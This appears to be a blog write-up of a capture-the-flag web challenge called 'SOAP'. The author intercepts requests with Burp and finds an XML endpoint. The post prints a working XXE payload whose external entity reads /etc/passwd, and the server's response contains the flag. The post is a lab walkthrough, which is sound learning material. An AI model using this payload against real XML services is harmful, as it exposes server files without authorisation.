Visitor Count
Home SOAP
Post
Cancel

SOAP

SOAP

CHALLENGE AUTHOR: GEOFFREY NJOGU

Description The web project was rushed and no security assessment was done. Can you read the /etc/passwd file? Web Portal

Solution

Well this challenge reminded me of LFI (local File Inclusion). It was an interesting challenge, I loved it. Let’s get started, shall we?

  1. Connect to the challenge via the provided url. image
  2. It looks very much static, I try the Detail buttons to check what they load and I proxy my requests through burp. image
  3. We get a path /data that appends an xml code snippet with the id parameter. image
  4. I immediately start crafting xml PoCs to dump the /etc/passwd
  5. I come up with
1
2
3
4
5
6
7
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [
  <!ENTITY readfile SYSTEM "file:///etc/passwd">
]>
<data>
  <ID>&readfile;</ID>
</data>
  1. I remove the existing xml and replace it with my crafted xml. image
  2. Sending the request, we get a response dumping the /etc/passwd and at the end of it we get our flag. image

That is it. Stay vigilant in the digital wild west. Happy Hacking

This post is licensed under CC BY 4.0 by the author.

Pico CTF (Special)

MatchTheRegex

Comments powered by Disqus.